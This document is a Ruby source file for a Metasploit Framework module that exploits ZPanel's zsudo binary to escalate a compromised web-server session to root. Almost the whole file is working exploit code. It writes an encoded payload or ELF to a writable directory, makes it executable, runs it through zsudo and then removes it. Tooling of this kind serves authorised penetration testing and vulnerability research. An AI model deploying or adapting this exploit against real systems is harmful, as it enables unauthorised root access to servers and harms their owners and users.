87 lines
2.6 KiB
Ruby
87 lines
2.6 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'rex'
|
|
require 'msf/core/post/common'
|
|
require 'msf/core/post/file'
|
|
require 'msf/core/post/linux/priv'
|
|
require 'msf/core/exploit/exe'
|
|
|
|
|
|
class Metasploit4 < Msf::Exploit::Local
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::EXE
|
|
include Msf::Post::File
|
|
include Msf::Post::Common
|
|
|
|
def initialize(info={})
|
|
super( update_info( info, {
|
|
'Name' => 'ZPanel zsudo Local Privilege Escalation Exploit',
|
|
'Description' => %q{
|
|
This module abuses the zsudo binary, installed with zpanel, to escalate
|
|
privileges. In order to work, a session with access to zsudo on the sudoers
|
|
configuration is needed. This module is useful for post exploitation of ZPanel
|
|
vulnerabilities, where typically web server privileges are acquired, and this
|
|
user is allowed to execute zsudo on the sudoers file.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [ 'sinn3r', 'juan vazquez' ],
|
|
'DisclosureDate' => 'Jun 07 2013',
|
|
'Platform' => [ 'unix', 'linux'],
|
|
'Arch' => [ ARCH_CMD, ARCH_X86 ],
|
|
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
|
'Targets' =>
|
|
[
|
|
[ 'Command payload', { 'Arch' => ARCH_CMD } ],
|
|
[ 'Linux x86', { 'Arch' => ARCH_X86 } ]
|
|
],
|
|
'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
|
|
'DefaultTarget' => 0,
|
|
}
|
|
))
|
|
register_options([
|
|
# These are not OptPath becuase it's a *remote* path
|
|
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
|
|
OptString.new("zsudo", [ true, "Path to zsudo executable", "/etc/zpanel/panel/bin/zsudo" ]),
|
|
], self.class)
|
|
end
|
|
|
|
def check
|
|
if file?(datastore["zsudo"])
|
|
return CheckCode::Detected
|
|
end
|
|
|
|
return CheckCode::Unknown
|
|
end
|
|
|
|
def exploit
|
|
if (target.arch.include? ARCH_CMD)
|
|
exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.sh"
|
|
# Using this way of writing the payload to avoid issues when failing to find
|
|
# a command on the victim for writing binary data
|
|
cmd_exec "echo \"#{payload.encoded.gsub(/"/, "\\\"")}\" > #{exe_file}"
|
|
else
|
|
exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
|
|
write_file(exe_file, generate_payload_exe)
|
|
end
|
|
|
|
cmd_exec "chmod +x #{exe_file}"
|
|
|
|
print_status("Running...")
|
|
|
|
begin
|
|
cmd_exec "#{datastore["zsudo"]} #{exe_file} #{rand_text_alpha(3 + rand(5))}"
|
|
ensure
|
|
cmd_exec "rm -f #{exe_file}"
|
|
end
|
|
|
|
end
|
|
end
|
|
|